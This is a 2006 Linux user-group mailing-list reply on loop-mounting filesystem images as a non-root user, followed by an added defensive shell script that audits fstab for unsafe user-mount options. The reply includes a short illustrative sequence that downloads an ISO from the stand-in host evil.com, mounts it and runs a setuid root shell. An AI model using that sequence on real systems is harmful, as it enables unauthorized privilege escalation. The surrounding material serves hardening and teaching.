Re: [PLUG] loopback mounting fs images

bergman on 16 Nov 2006 22:54:48 -0000





In the message dated: 16 Nov 2006 17:24:07 EST,
The pithy ruminations from Jeff Abrahamson on 
<[PLUG] loopback mounting fs images> were:
=> 
=> 
=> Mount in general denies its services to non-privileged users unless
=> explicit authorization is made in /etc/fstab.
=> 
=> I'd like to be able to mount filesystem images from an already mounted
=> filesystem without having to authorize myself specially. I don't
By "filesystem images from an already mounted filesystem" do you mean that an 
image already exists as a file on the machine?
=> think this is possible, but I'm curious (1) if I'm wrong and it is
=> possible, and (2) what the security concerns of this would be as long
=> as mount restricted me to mounting files I own on mount-points I own
=> and didn't permit files in the newly mounted fs to have permissions or
=> ownership that I couldn't otherwise give them.
I don't understand the last part "as long as mount...didn't permit files in the 
newly mounted fs to have permissions or ownership that I couldn't otherwise 
give them". AFAIK, mount(8) doesn't have that kind of control. You can get some 
of what you want with the "nosuid" option, but I don't believe that mount will 
change the ownership of files to match the person doing the mounting.
Of course, mount has a gazillion options, depending on the specific filesystem 
type that you are mounting, and how well those filesystem semantics translate 
to your OS.
You may want to consider FUSE (http://fuse.sourceforge.net/) and the Mountlo 
project. [DISCLAIMER]I haven't actually used FUSE.[/DISCLAIMER]
Otherwise, it's all too easy to do:
	
	joeuser% cd /tmp
	joeuser% wget -nd http://evil.com/downloads/crackertools.iso
	joeuser% mkdir /tmp/mymountpoint
	joeuser% mount /tmp/crackertools.iso /tmp/mymountpoint -t iso9660 -o loop=/dev/loop3,blocksize=1024
	joeuser% ls -l /tmp/mymountpoint 
	-rws--x--x 1 root bin 106924 Jan 9 2004 getrootshell
	joeuser% /tmp/mymountpoint/getrootshell
	joeuser#
[the exercise of gaining root when you own device files is a bit more tricky, 
but quite possible].
Seriously, if you're going to permit users to mount file systems, 
enforce the "noexec" and "nosuid" and "nodev" options. 
Mark
=> 
=> Jeff
=> 
=> Jeff Abrahamson <http://jeff.purple.com/> +1 215/837-2287
=> GPG fingerprint: 1A1A BA95 D082 A558 A276 63C6 16BF 8C4C 0D1D AE4B
=> 
___________________________________________________________________________
Philadelphia Linux Users Group -- http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug
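The closing advice above (enforce "noexec", "nosuid" and "nodev" on anything users may mount) is easy to get wrong in /etc/fstab, because mount(8) applies those three implicitly for the "user" and "users" options but lets a later explicit "exec", "suid" or "dev" on the same line re-enable them. The script below is an added example, written for this page and not code from the original post or the list: it walks each fstab entry's option list in order, works out which of suid/dev/exec are actually still on for user-mountable entries, and reports the unsafe ones. It goes slightly beyond the post by also handling "owner" and "group" (which per mount(8) imply only nosuid and nodev, not noexec). The fstab content is a constructed sample, not a real system's; the function and variable names are the example's own.

```shell
#!/bin/sh
# Added example (not from the original post): audit fstab entries that let
# ordinary users mount a filesystem and report any that still have suid,
# dev or exec enabled. Per mount(8): "user"/"users" imply nosuid,nodev,noexec;
# "owner"/"group" imply nosuid,nodev; a LATER explicit suid/dev/exec wins,
# so option order matters. "defaults" means rw,suid,dev,exec,auto,nouser,async.
set -f   # no globbing while splitting fstab fields

# Constructed sample fstab (not a real machine's). The last three entries are
# user-mountable; two of them re-enable something they should not.
SAMPLE_FSTAB='# <device>        <mountpoint>   <type>   <options>                        <dump> <pass>
/dev/sda1         /              ext4     defaults                         1 1
/dev/cdrom        /media/cdrom   iso9660  ro,user,noauto                   0 0
/home/joe/img.iso /home/joe/mnt  iso9660  loop,user,noauto,exec,suid       0 0
/dev/sdb1         /media/usb     vfat     users,noauto,dev                 0 0
/dev/sdc1         /media/safe    ext3     user,noauto,nosuid,nodev,noexec  0 0'

# Walk a comma-separated option list left to right, tracking the effective
# state of suid/dev/exec and whether a non-root user may mount the entry.
# Results are left in the globals suid, dev, exec, usermount (POSIX sh has
# no "local").
parse_opts() {
    suid=1; dev=1; exec=1; usermount=0      # kernel defaults: all three on
    _oldifs=$IFS; IFS=,
    for _o in $1; do
        case "$_o" in
            defaults)    suid=1; dev=1; exec=1; usermount=0 ;;
            user|users)  usermount=1; suid=0; dev=0; exec=0 ;;
            owner|group) usermount=1; suid=0; dev=0 ;;
            nouser)      usermount=0 ;;
            suid)        suid=1 ;;   nosuid) suid=0 ;;
            dev)         dev=1 ;;    nodev)  dev=0 ;;
            exec)        exec=1 ;;   noexec) exec=0 ;;
        esac
    done
    IFS=$_oldifs
}

# Print the flags that end up enabled, e.g. "suid exec"; prints an empty
# line if all three are off.
effective_flags() {
    parse_opts "$1"
    _out=""
    [ "$suid" -eq 1 ] && _out="$_out suid"
    [ "$dev" -eq 1 ]  && _out="$_out dev"
    [ "$exec" -eq 1 ] && _out="$_out exec"
    printf '%s\n' "${_out# }"
}

# Exit status 0 if the option list lets an ordinary user mount the entry.
is_user_mountable() {
    parse_opts "$1"
    [ "$usermount" -eq 1 ]
}

# Read fstab text on stdin; print one line per user-mountable entry that
# still has suid, dev or exec enabled. Returns 1 if any were found, else 0.
audit_fstab() {
    _found=0
    while IFS= read -r _line; do
        case "$_line" in ''|\#*) continue ;; esac
        set -- $_line                       # split on whitespace into fields
        [ $# -ge 4 ] || continue
        _mnt=$2; _opts=$4
        is_user_mountable "$_opts" || continue
        _risky=$(effective_flags "$_opts")
        if [ -n "$_risky" ]; then
            printf '%s: user-mountable with %s enabled (options: %s)\n' \
                "$_mnt" "$_risky" "$_opts"
            _found=1
        fi
    done
    [ "$_found" -eq 0 ]
}

# Demo on the constructed sample; on a real box run: audit_fstab < /etc/fstab
printf '%s\n' "$SAMPLE_FSTAB" | audit_fstab || echo "unsafe user-mountable entries found"
```

On the sample this flags /home/joe/mnt (suid and exec re-enabled after "user") and /media/usb (dev re-enabled after "users"), and stays quiet about /media/cdrom and /media/safe. Note that the "loop" option in an fstab entry is exactly the setup the post warns about: a user-supplied image file, such as the crackertools.iso in the example, becomes a mounted filesystem whose setuid bits the kernel honours unless nosuid is in effect.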


